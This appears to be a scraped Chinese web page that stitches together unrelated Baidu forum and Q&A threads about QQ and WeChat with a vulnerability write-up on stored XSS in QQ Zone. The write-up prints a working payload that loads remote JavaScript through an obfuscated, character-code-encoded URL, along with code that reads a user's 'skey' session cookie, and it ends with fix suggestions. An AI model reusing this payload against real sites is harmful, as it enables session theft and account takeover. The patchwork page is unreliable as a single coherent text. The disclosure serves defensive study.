网络霸主安小超重回网络了吗?谁能告诉我QQ号?是传言,还是真的?_小超吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0可签7级以上的吧50个
本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:139贴子:
网络霸主安小超重回网络了吗?谁能告诉我QQ号?是传言,还是真的?
昨天我的一个同学和我说他认识了网络红人安小超,还告诉我他的QQ,我 本来以为他吹牛B呢。上网来证实一下
一直特别喜欢时装[SMILI...
没图你不来?情头阵
首先准备一个没气的打火...
【新故障/4G信号不稳定/...
一楼说了的话你们指定就...
我看到好多软件技术的,...
海爷镇楼 ...
rt,卖号转战天刀,需要...
你怎么要的他QQ?我很想知道
真的假的啊??我加一下认识一下,他要是不理我就是骗子,哼
帅哥吗?我喜欢。。。。。。。。。。。。。。。。
还有别的帅哥QQ吗?给我甩两个再
无语了。。。。。。红人能做到这么没架子》》》》少见
楼主,我帮你证实了,貌似是真的
不排除是假冒的喔
那个小妹妹,我有好多帅哥的QQ呢,就是不给你,气死你
内&&容:使用签名档&&
保存至快速回贴
为兴趣而生,贴吧更懂你。&或谁能告诉我一个类似QQ软件一样的带有网络硬盘的_百度知道
谁能告诉我一个类似QQ软件一样的带有网络硬盘的
谁能告诉我一个类似QQ软件一样的带有网络硬盘的
可以到上申请一个专门的网络硬盘,免费的有32M的容量.
其他类似问题
为您推荐:
您可能关注的推广回答者:
qq软件的相关知识
其他1条回答
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁QQ空间存储型XSS漏洞的组合利用(图解)
QQ空间的新型漏洞我们再试试
1. QQ空间某处正则混乱,导致恶意构造。2. QQ空间某文件存在潜在风险3. 1+2 = 此漏洞&详细说明:1. 一开始的目标是这个http://b./cgi-bin/custom/modify_custom_window.cgi,这个页面是用来修改QQ空间模块内容的。这里我选择提交的是FLASH模块。 由于此请求,每请求一次都需要输入一个验证码,所以没办法直接在抓包工具里修改并发送。所以最初是用调试工具去修改DOM属性,然后写自定义值来一次一次的试,后来实在觉得太麻烦了,就自己临时写了个小工具。以下测试均用此工具进行,如下,&&&&&2. 开始试了此请求的几个参数(这里的参数是指qzml所发送的xml里的若干属性,例如width, height ,wmode etc ..),都被过滤了, 后来懒么,就把能写入内容的都改成了'\/&&..,结果侧漏了。。&测试的qzml请求参数大概是这样:encodeURIComponent('&qz:title type=&flash& moduleborder=&true&&xxx&/qz:title&&div&&qz:swf swfsrc=http://files.jb51.net/file_images/article/64.gif.swf& _fcksavedurl=&http://files.jb51.net/file_images/article/64.gif.swf&& _fcksavedurl=&http://files.jb51.net/file_images/article/64.gif.swf&& width=&\'\/&&& height=&\'\/&&& loop=&\'\/&&& waitforclick=&\'\/&&& wmode=&\'\/&&&/&&/div&'.replace(/\s/g,&+&)).replace(/%2B/g,&+&);&侧漏效果大概如下:(反正是类似这个效果,懒的回去抓图了。)&&&&&3. 开始分析侧漏原因。 发现height属性把其它属性都吞掉了。 于是其它参数复原,单个测试height,在height里加入单引号时, 服务器端的正则貌似就凌乱了。 同样有此现象的还有swfsrc 。&因为服务器那边是怎么匹配的,不清楚, 于是就开始各种构造测试,看服务器端输出。&反正测试了挺久。 具体就不详述。 因为服务器端输出的embed标签里,总是带着allowscriptaccess=&never&,导致我们调用的FLASH来执行脚本,所以最终目的,就是想用height来屏蔽掉allowscriptaccess=&never& 。&测试过程中,出现了以下几种阻碍。&3A. allowscriptaccess=&never& 成功被我们的height 吞掉, 但是src属性没了。服务器端输出如下代码:&&div style=&height: 142& id=&cst_flash&&&embed id=&flash& height=' src=http://ctc./ac/c.gif.swf _fcksavedurl=&http://ctc./ac/c.gif.swf& _fcksavedurl=&http://ctc./ac/c.gif.swf& autostart=&false& loop=&true& invokeurls=&false& allownetworking=&all& allowscriptaccess=&never& wmode=&' type=&application/x-shockwave-flash& width=&'& src=&& invokeurls=&false& scalemode=&noScale& allowscriptaccess='always&' embed=&embed& menu=&false&&&/div&&3B. 自己添加了src 属性, 但是发现服务器端又自己加上了allowscriptaccess=&never& 。。纠结了。服务器端输出如下代码:&&div style=&height: 142& id=&cst_flash&&&embed id=&flash& height=&/&& src=http://ctc./ac/c.gif.swf& width='&&34;src = http ' src=&/c.swf& allowscriptaccess=&never& allownetworking=&internal& invokeurls=&false& autostart=&true& menu=&false&& autostart=&false& loop=&true& invokeurls=&false& allownetworking=&all& allowscriptaccess=&never& wmode=&opaque& type=&application/x-shockwave-flash& scaleMode=&noScale& &&/div& &4. 对于各种无厘头,有时候还是要靠运气。 在3B的代码基础上,偶然发现,如果src属性里加了\',就不会出现问题。 所以我们构造src地址为/c.swf?1=\'\'\', 这样就不会出现allowscriptaccess参数了。&5. 但是问题接着来了,大家都知道,allowscriptaccess 默认是sameDomain的,哪里去找同域下的FLASH啊。 巧合的是,还真有一个可以用的。 在抓包QQ空间的时候,瞥见这么一个FLASH,&http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=QZONE.frontPageAccessory.zoomDetect.onZoomChange&我一瞧, 后面这个QZONE.frontPageAccessory.zoomDetect.onZoomChange 不就是个JS函数么。 于是试了一下。&http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=alert&果然可以弹出啊。 这样看来,我们可以利用下。 不过这个ctc. 和 模块的ctc. 还是不是一个域啊, 但是运气好,恰好, 这2个域名,貌似资源文件是一样的,或者有部分是一样的?ctc. 下面也有该FLASH文件。 如下:&http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=alert&6. 所以,我们最终可以构造出FLASH的src为&/qzone/v6/accessory/plugin/zoom.swf?onchange=function(){s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,116,111,111,108,109,97,111,46,99,111,109,47,116,111,111,108,47,113,113,109,97,105,108,46,106,115);document.body.appendChild(s);}&1=\'\'\'\'&其中,前面是FLASH地址,onchange参数调用我们自己函数,1=\'\'\'\' 是为了屏蔽掉allowscriptaccess=&never&&7. 上面这个地址我们简写为{SWFURL}, 它是位于height属性里的,如下&height=&&\'/\& src={SWFURL} style=width:/ &&&8. = = 写不下去了。。 直接上最后的测试代码。 有点乱。。有些是测试残留,没实际意义,比如里的&"34; 这种。。&&qzml&:encodeURIComponent('&qz:title type=&flash& moduleborder=&true&&xxx&/qz:title&&div&&qz:swf swfsrc=http://files.jb51.net/file_images/article/64.gif.swf\' ALLOWSCRIPTACCESS autostart=true\'\"\u0009src\u0013=/c.swf / & && width=&&"34;src = http & height=&&\'/\& src=/qzone/v6/accessory/plugin/zoom.swf?onchange=function(){s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,116,111,111,108,109,97,111,46,99,111,109,47,116,111,111,108,47,113,113,109,97,105,108,46,106,115);document.body.appendChild(s);}&1=\'\'\'\' style=width:/ && loop=&true& waitforclick=&true& wmode=&&/&&/div&'.replace(/\s/g,&+&)).replace(/%2B/g,&+&)&9. 上面代码会调用我自己的网站的JS。 在调用JS这一步,&目测IE 应该是通杀吧?IE6没试过。vista+IE7, win7+IE8,9 是可以的。&Chrome 也是可以的,ff 下蛋疼了,需要给加上type=&application/x-shockwave-flash& 才行, 没去弄,这个属性应该也是可以加的上的。&10. 到这里, 可以alert, 可以跳转。&IE下的alert&&&&&Chrome下的跳转&&&&&11. 但是我们亲爱的cookies 没办法弹出来啊。&原因是,如前所述,模块的域是ctc. ,&而空间的域是qq.com ,没有办法跨域获取cookies。&不过好在,QQ空间开发人员为我们准备好了这一功能, 原理就是在当前页中,嵌入一个和父窗口同域的iframe页面,来进行通讯。&我们直接调用QQ空间开发人员写好的库,来获取cookies,代码如下:&QZONE.Cross.Client.getInstance().sendInvoke('QZFL.cookie.get', 'skey',function(str){alert(&您的skey是:&+str);});&效果如下:&&&需要说明的是: 获取cookies这一步,IE下有效,chrome 貌似错误了,粗略看了下,对于跨域请求,Qzone开发人员针对HTML5和普通的采用的是不同的方案,在chrome下莫名的悲剧了。。 我只是调用了你们开发人员写的东西,= = 悲剧别找我,哈哈修复方案:1. 服务器端在从提交过去的qzml这段XML里获取FLASH的属性时,正则写错了? 只是猜测。2. 目测服务器端验证qzml是否合法的正则不够好, 像width, height 这种参数,直接\d{m,n}就可以吧。 貌似width ,height 属性里什么东西都可以写啊。 只在客户端限制width,height输入框长度为3,没什么实际作用的。。其它属性也一样,什么wmode只需要true|false 即可。3. 这个http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=function(){location='钓鱼网站'} 单独就是一个漏洞。&http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=QZONE.frontPageAccessory.zoomDetect.onZoomChange 这个被利用的flash文件需修改一下。 在FLASH限制一下onchange 参数的值。&作者 gainover谁能告诉我为啥手机网络好好的,网页刷得出来,qq可以发消息,就微信消息发不出去_百度知道
谁能告诉我为啥手机网络好好的,网页刷得出来,qq可以发消息,就微信消息发不出去
提问者采纳
重启手机或重开网络。
你有微信吗
别听他瞎说微信服务器现在好的很。
好吧,真的是我手机问题
怎么解决的?
是用我这种方法吗?是就给个采纳吧!
我怎么知道
现在还上不去啊。
你重启手机了吗?如果按照他们说的把微信卸载也可以。只要把安装包保留着。直接从安装包上点安装,不费流量就可以了。
额什么?要不给个采纳,要不88。
我手机就是这么解决的。我是学信息技术的。
用我的方法肯定能解决。只是你不知道怎么操作而已。
不可以的话我会给好评吗
是用我的方法吗?
太骄傲了。
我就说嘛,肯定行的。
我去继续为他人服务哈哈!
提问者评价
太给力了,你的回答完美解决了我的问题!
其他类似问题
为您推荐:
其他2条回答
微信的服务器出问题了,马上就好了
你有微信吗?
现在能用吗
有时候我QQ上不去但同事的能用,这是正常的,因为我们不在同一个服务器
我刚刚试了能发能收
你的还不能用
把号发过来我试试
可以用我干嘛要发给你
哦好吧,你试试能采纳不
也许是软件安装时出现差错?卸载重下试试?
你微信能用吗
好吧,真的是我手机问题
重下试试,不行换个资源下载看看吧,其余我就没招了
哈哈……真的,试试也许就好了。?
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁您还未登陆,请登录后操作!
各位网络高手们,谁能告诉我怎样申请可以国际聊天的QQ.谢谢
申请,她男朋友在韩国,可是两个人想聊天和视频,却不知道怎样才能网上视频。
两个人都申请qq就可以了,两个人都用qq就可以聊天,不需要专门的软件。
除了qq以外,msn也是大家很常用的聊天软件。
另外skype也相当不错,尤其是视频的效果不错。
以上的软件都支持视频聊天,都是免费注册,都可以在国外跟国内来聊天。
的,他们用MSN或者别的什么聊天软件
您的举报已经提交成功,我们将尽快处理,谢谢!
大家还关注